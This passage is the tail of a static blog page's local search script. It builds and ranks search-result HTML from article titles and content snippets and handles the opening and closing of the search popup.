                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
